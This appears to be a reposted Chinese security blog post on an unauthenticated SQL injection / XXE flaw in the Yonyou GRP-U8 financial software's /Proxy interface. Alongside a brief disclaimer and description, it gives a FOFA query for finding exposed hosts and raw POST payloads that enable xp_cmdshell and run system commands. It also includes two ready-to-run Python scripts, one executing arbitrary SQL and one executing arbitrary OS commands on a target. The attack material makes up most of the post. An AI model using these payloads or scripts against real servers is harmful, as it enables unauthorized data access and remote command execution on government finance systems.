用友 GRP-U8 Proxy XXE-SQL注入漏洞

淡淡的烟草味﹌ 2024-04-03 10:38 25阅读 0赞

#### 文章目录 ####

*  声明
 *  一、漏洞详情
 *  二、漏洞描述
 *  三、利用条件
 *  四、漏洞POC
 *  五、利用脚本
 *  六、漏洞代码分析

--------------------

## 声明 ##

本篇文章仅限技术学习与安全研究，切勿将文中所涉及的攻击手段用于非授权下渗透行为，造成任何后果与本文和作者无关。

--------------------

## 一、漏洞详情 ##

用友GRP-U8R10行政事业财务管理软件是用友公司专注于国家电子政务事业，基于云计算技术所推出的新一代产品，是我国行政事业财务领域最专业的政府财务管理软件。  
![在这里插入图片描述][6d3d255f39b4433685af6e0ad7e8e5e9.png]

## 二、漏洞描述 ##

该漏洞源于应用程序解析XML输入时没有禁止外部实体的加载，导致可加载恶意外部文件。最终产生两种后果，一是可以进行SQL注入，执行SQL语句；二是导致命令执行，当用户可以控制命令执行函数中的参数时，将可注入恶意系统命令到正常命令中，造成命令执行攻击。

用友 GRP-U8 Proxy 接口存在 SQL 注入漏洞，攻击者通过漏洞可以获取服务器权限。

--------------------

FOFA：title=“GRP-U8” 或 title=“用友 GRP-U8 行政事业内控管理软件”

--------------------

## 三、利用条件 ##

无需登录

## 四、漏洞POC ##

POST /Proxy HTTP/1.1  
Accept: \*  
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64)  
Host: \{ \{Hostname\}\}  
Content-type: application/x-www-form-urlencoded  
Content-Length: 349  
Connection: close

//查询数据库版本(MSSQL),并回显
    	cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><
    	DATAFORMAT>XML</DATAFORMAT><R9FUNCTION> <NAME>AS_DataRequest</NAME><PARAMS><P
    	ARAM> <NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA>
    	</PARAM><PARAM> <NAME>Data</NAME><DATA format="text">select @@version</DATA><
    	/PARAM></PARAMS> </R9FUNCTION></R9PACKET>
    
    //查询当前数据库名称
    	cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><
    	DATAFORMAT>XML</DATAFORMAT><R9FUNCTION> <NAME>AS_DataRequest</NAME><PARAMS><P
    	ARAM> <NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA>
    	</PARAM><PARAM> <NAME>Data</NAME><DATA format="text">select db_name()</DATA><
    	/PARAM></PARAMS> </R9FUNCTION></R9PACKET>

以POST方式发送如下几个Payload，开启 xp\_cmdshell 操作，查询到当前数据库名称后，第一个包需要修改当前库名

cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><
    DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PA
    RAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></
    PARAM><PARAM><NAME>Data</NAME><DATA format="text">use master</DATA></PARAM></
    PARAMS></R9FUNCTION></R9PACKET>
    
    cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><
    DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PA
    RAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></
    PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec sp_configure 'show adv
    anced options',1</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>
    
    cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><
    DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PA
    RAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></
    PARAM><PARAM><NAME>Data</NAME><DATA format="text">reconfigure</DATA></PARAM><
    /PARAMS></R9FUNCTION></R9PACKET>
    
    cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><
    DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PA
    RAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></
    PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec sp_configure 'xp_cmdsh
    ell',1</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>
    
    cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><
    DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PA
    RAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></
    PARAM><PARAM><NAME>Data</NAME><DATA format="text">reconfigure</DATA></PARAM><
    /PARAMS></R9FUNCTION></R9PACKET>
    
    
    //执行dir命令
    cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><
    DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PA
    RAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></
    PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec xp_cmdshell "dir"</DAT
    A></PARAM></PARAMS></R9FUNCTION></R9PACKET>

上面几个POC大概意思就是开启xp\_cmdshell指令并刷新配置

USE master  
EXEC sp\_configure ‘show advanced options’,1 //启用xp\_cmdshell的高级配置 RECONFIGURE --刷新配置  
RECONFIGURE //先执行一次刷新，处理上次的配置  
EXEC sp\_configure ‘xp\_cmdshell’,1 //打开xp\_cmdshell,可以调用SQL系统 之外的命令  
RECONFIGURE //刷新配置

## 五、利用脚本 ##

GRP-U8\_SQLinjection\_POC

#!/usr/bin/env python2
    #coding:utf-8
    import re
    import requests
    import sys
    reload(sys)
    sys.setdefaultencoding('utf-8')
    if len(sys.argv) != 3:
        print "Usage: python poc.py url sql"
        sys.exit(1)
    url = sys.argv[1]
    sql = sys.argv[2]
    headers = {
    	"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36",
    	"Content-Type":"application/x-www-form-urlencoded",
    }
    def poc(url,sql):
    	url = url + '/Proxy'
    	print url
    	data = 'cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">'+sql+'</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>'
    	res = requests.post(url,headers=headers,data=data)
    	res = res.text
    	result_row = r'<ROW COLUMN1="(.*?)"'
    	ROW = re.findall(result_row,res,re.S | re.M)
    	print '查询成功！'
    	print ROW[0]
    if __name__ == "__main__":
        poc(sys.argv[1],sys.argv[2])

GRP-U8\_SQLinjection\_EXP

#!/usr/bin/env python2
    #coding:utf-8
    import re
    import requests
    import sys
    reload(sys)
    sys.setdefaultencoding('utf-8')
    if len(sys.argv) != 3:
        print "Usage: python exp.py url cmd"
        sys.exit(1)
    url = sys.argv[1]
    cmd = sys.argv[2]
    headers = {
    	"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36",
    	"Content-Type":"application/x-www-form-urlencoded",
    }
    def exp(url,cmd):
    	url = url+ '/Proxy'
    	print url
    	data = 'cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec xp_cmdshell \''+cmd+'\'</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>'
    	res = requests.post(url,headers=headers,data=data)
    	res = res.text
    	result_row = r'<ROW output="(.*?)" />'
    	ROW = re.findall(result_row,res,re.S | re.M)
    	print '命令执行成功！'
    	for i in range(len(ROW)):
    		print ROW[i]
    if __name__ == "__main__":
        exp(sys.argv[1],sys.argv[2])

## 六、漏洞代码分析 ##

可参考文章：https://baijiahao.baidu.com/s?id=1681131145841849209&wfr=spider&for=pc

[6d3d255f39b4433685af6e0ad7e8e5e9.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/03/ce6608f70227461ebbc9c145de7a6279.png